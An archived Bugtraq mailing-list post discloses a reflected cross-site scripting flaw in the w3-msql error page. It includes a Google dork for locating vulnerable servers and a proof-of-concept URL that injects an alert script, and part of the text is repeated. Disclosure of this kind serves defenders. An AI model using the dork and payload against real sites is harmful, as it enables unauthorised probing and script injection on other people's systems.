Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Bugtraq: Bugtraq

xss in w3-msql error page

  

 
Bugtraq bugtraq RSS feed   Index | Next | Previous | View Threaded


vivek_infosec at yahoo

Jan 3, 2008, 6:11 AM

Post #1 of 1 (453 views)
Permalink
xss in w3-msql error page
A reflected xss flaw exists in the w3-msql error page.

google dork : "W3-mSQL Error! - Can't stat script file (/"

Just insert a script from the start of /

like if u get a URL like:-

http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html

and the error page output as :-

W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)

u can try this:-

A reflected xss flaw exists in the w3-msql error page.

google dork : "W3-mSQL Error! - Can't stat script file (/"

Just insert a script from the start of /

like if u get a URL like:-

http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>

to confirm the issue

Bugtraq bugtraq RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.